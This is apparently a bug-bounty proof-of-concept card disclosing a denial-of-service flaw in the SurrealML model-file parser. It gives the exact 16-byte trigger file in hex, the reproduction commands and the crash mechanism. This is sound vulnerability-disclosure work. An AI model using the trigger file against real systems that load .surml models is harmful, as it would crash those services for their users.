YAML Metadata Warning:empty or missing yaml metadata in repo card
Check out the documentation for more information.
SurrealML Parser DoS β PoC Package
Finding: A 16-byte malformed .surml model file causes deterministic process abort in the native SurrealML parser before ONNX runtime initialization.
Impact: DoS (process abort). No RCE, no ACE, no memory corruption claimed.
Affected: surrealml==0.0.4 / libc_wrapper.so v0.1.2 (released 2025-04-29)
Route: huntr MFV (Model Format Vulnerability)
Summary
The SurrealML native parser (libc_wrapper.so) reads the first 4 bytes of a .surml file as a little-endian u32 and uses this value directly as a Vec<u8> allocation length without any bounds check. Providing a value of 0xFFFFFFFF (4,294,967,295) causes the allocator to fail, triggering a Rust panic which β because the library is compiled with panic = abort β immediately kills the process with SIGABRT (exit code 134).
The crash occurs before ONNX runtime initialization. The ONNX runtime is not required to reproduce this issue.
Files
| File | Description |
|---|---|
reproduce_direct_ctypes_crash.py |
Primary reproduction script β direct ctypes path |
mf_maxlen.surml |
Trigger file (16 bytes, first u32 = 0xFFFFFFFF) |
mf_issue20_control.surml |
Control file β demonstrates prior-art distinction |
requirements.txt |
surrealml==0.0.4 |
evidence_crash_matrix.json |
3-run crash evidence with threshold analysis |
evidence_prior_art_distinction.json |
Distinction from GitHub issue #20 |
evidence_environment.json |
Library version and ONNX bypass method |
SHA256SUMS.txt |
SHA256 hashes for all files |
Reproduction
pip install surrealml==0.0.4
python reproduce_direct_ctypes_crash.py
Expected output:
[INFO] surrealml version: 0.0.4
[INFO] libc_wrapper.so: <path>
[INFO] Trigger: mf_maxlen.surml (16 bytes)
[INFO] Trigger SHA256: 231f5cecc61699ca90f5e9acdbc4c47552f66daeb7ef55327cb7574cda9f29e5
[INFO] SHA256 verified β
[CONTROL] Control file result: is_error=1 (safe β prior art path is fixed in v0.1.2)
[CRASH TEST] Running crash in subprocess...
[CRASH TEST] Child exit code: 134
[CRASH TEST] Child stderr: memory allocation of 4294967295 bytes failed
[RESULT] PASS β deterministic SIGABRT confirmed (exit 134, expected allocation failure message)
How the Crash Works
.surml file layout (first 4 bytes):
[0:4] u32 LE β header_length (used directly as Vec<u8> allocation size)
[4:4+header_length] β header body
mf_maxlen.surml:
ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00
βββββββββββββββββββ
header_length = 4,294,967,295 bytes
Result: Vec::with_capacity(4294967295) β allocator failure β panic (abort) β SIGABRT
The ONNX runtime is not involved. The crash occurs in load_model() before any ONNX-related code path.
ONNX bypass: link_onnx() returns an error struct (ONNX runtime extraction fails in some environments). This error is intentionally ignored in the reproduction script. The load_model() crash occurs independently.
Prior-Art Distinction
This finding is distinct from GitHub issue #20:
| Issue #20 | This Finding | |
|---|---|---|
| Filed | Jan 2024 | May 2026 |
| Trigger | 3717-byte file, first u32 = 757,932,081 | 16-byte file, first u32 = 4,294,967,295 |
| Crash type | OOB slice index | Vec allocation failure |
| Crash message | range end index ... out of range for slice |
memory allocation of N bytes failed |
| Fixed in v0.1.2? | Yes β returns is_error=1 safely |
No β SIGABRT |
| Fix location | Server-side only (surrealdb PR #3773) | Not fixed in libc_wrapper.so |
Control file verification: mf_issue20_control.surml (exact issue #20 trigger) returns is_error=1 gracefully in v0.1.2. This confirms the prior-art path is handled, while the allocation-exhaustion path is not.
Non-Claims
This PoC does not claim:
- Remote code execution (RCE)
- Arbitrary code execution (ACE)
- Memory corruption / buffer overflow / heap spray
- Privilege escalation
- SurrealDB server compromise
- High or Critical severity
- CVSS score
The impact is limited to deterministic process abort (DoS) when loading an untrusted .surml file.
Trigger File
Name: mf_maxlen.surml
Size: 16 bytes
Hex: ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00
SHA256: 231f5cecc61699ca90f5e9acdbc4c47552f66daeb7ef55327cb7574cda9f29e5